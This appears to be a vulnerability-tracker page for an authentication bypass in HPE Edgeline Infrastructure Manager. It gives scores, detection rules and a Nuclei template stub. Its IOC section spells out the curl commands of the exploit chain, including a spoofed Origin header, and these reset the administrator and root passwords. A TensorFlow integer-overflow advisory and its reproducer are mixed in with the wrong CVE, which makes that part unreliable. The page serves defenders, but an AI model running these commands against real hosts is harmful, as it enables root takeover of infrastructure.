CVE-2021-29203
published 2021-05-06CVE-2021-29203: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior…
PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
68.29%
99.2th percentile
A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | edgeline_infrastructure_manager | < 1.22 | 1.22 |
| intel | optimization_for_tensorflow | >= 0 < 2.6.4 | 2.6.4 |
| intel | optimization_for_tensorflow | >= 2.7.0 < 2.7.2 | 2.7.2 |
| intel | optimization_for_tensorflow | >= 2.8.0 < 2.8.1 | 2.8.1 |
Detection & IOCsextracted from sources · hover to see the quote
commandcurl -k --tlsv1.2 -H 'Content-Type: application/json' -d '{"Password":"attacker"}' -X PATCH https:///redfish/v1/SessionService/ResetPassword/1↗
commandcurl -ki --tlsv1.2 -H 'content-type: application/json' -d '{"UserName":"Administrator","Password":"attacker"}' https:///redfish/v1/SessionService/Sessions↗
commandcurl -ki --tlsv1.2 -H 'content-type: application/json' -H 'x-auth-token: eda6c27504c54cf68e1d005742c1ef8c573e5e60' -d '{"Password":"attacker"}' -X PATCH https:///redfish/v1/AccountService/Accounts/1↗
commandcurl -k --tlsv1.2 -H 'Content-Type: application/json' -H 'Origin: https://127.0.0.1' -d '{"Password":"attacker"}' -X PATCH https:///redfish/v1/SessionService/ResetPassword/1↗
sigma
PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
- →Detect unauthenticated PATCH requests to /redfish/v1/SessionService/ResetPassword/1 — this endpoint should only be accessible from the local console (127.0.0.1) and any remote PATCH to it indicates exploitation of the auth bypass. ↗
- →Detect HTTP requests to /redfish/v1/SessionService/ResetPassword/1 that include a spoofed 'Origin: https://127.0.0.1' header from a non-loopback remote IP — this is the v1.22 patch bypass technique. ↗
- →Alert on POST to /redfish/v1/SessionService/Sessions with body containing 'UserName':'Administrator' immediately following a PATCH to /redfish/v1/SessionService/ResetPassword/1 from the same source IP — indicates full attack chain execution. ↗
- →Monitor for PATCH requests to /redfish/v1/AccountService/Accounts/1 with an X-Auth-Token header — this step resets both the Administrator webapp password and the OS root account password, enabling SSH root access. ↗
- →Look for HTTP 201 responses from /redfish/v1/SessionService/Sessions containing both 'X-Auth-Token' and 'PasswordReset' headers — the Nuclei template uses these as confirmation of successful authentication after the bypass.
- →Detect response body containing 'Base.1.0.Created' with HTTP 201 status from /redfish/v1/SessionService/Sessions — this confirms a successful login session was created post-password-reset.
- ·The v1.22 patch is incomplete — it only checks the Origin header value ('https://127.0.0.1') to restrict password reset to console users, but an attacker can trivially spoof this header remotely. Full mitigation requires upgrading to version 1.23. ↗
- ·The vulnerable endpoint /redfish/v1/SessionService/ResetPassword/1 is decorated with AllowAll permission class, meaning no authentication is enforced at the framework level — network-layer blocking of this endpoint is an interim mitigation. ↗
- ·Exploitation of /redfish/v1/AccountService/Accounts/1 resets BOTH the web application Administrator account AND the OS root account simultaneously, meaning a successful attack grants SSH root access to the underlying host. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-cp6r-8qhx-6m32: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software
ghsa_unreviewed·2022-05-24
CVE-2021-29203 [CRITICAL] CWE-287 GHSA-cp6r-8qhx-6m32: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software
A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
GHSA
Integer overflow in `SpaceToBatchND`
ghsa·2022-05-24
CVE-2022-29203 [MEDIUM] CWE-190 Integer overflow in `SpaceToBatchND`
Integer overflow in `SpaceToBatchND`
### Impact
The implementation of `tf.raw_ops.SpaceToBatchND` (in all backends such as XLA and handwritten kernels) is vulnerable to an integer overflow:
```python
import tensorflow as tf
input = tf.constant(-3.5e+35, shape=[10,19,22], dtype=tf.float32)
block_shape = tf.constant(-1879048192, shape=[2], dtype=tf.int64)
paddings = tf.constant(0, shape=[2,2], dtype=tf.int32)
tf.raw_ops.SpaceToBatchND(input=input, block_shape=block_shape, paddings=paddings)
```
The result of this integer overflow is used to allocate the output tensor, hence we get a denial of service via a `CHECK`-failure (assertion failure), as in [TFSA-2021-198](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-198.md).
### Patches
We have pat
VulnCheck
HP edgeline_infrastructure_manager Missing Authentication for Critical Function
vulncheck·2021·CVSS 9.8
CVE-2021-29203 [CRITICAL] HP edgeline_infrastructure_manager Missing Authentication for Critical Function
HP edgeline_infrastructure_manager Missing Authentication for Critical Function
A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
Affected: HP edgeline_infrastructure_manager
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
No detection rules found.
Nuclei
HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass
nuclei·CVSS 9.8
CVE-2021-29203 [CRITICAL] HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass
HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass
HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.
Template:
id: CVE-2021-29203
info:
name: HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass
author: madrobot
severity: critical
description: HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely expl
2021-05-06
Published
Exploited in the wild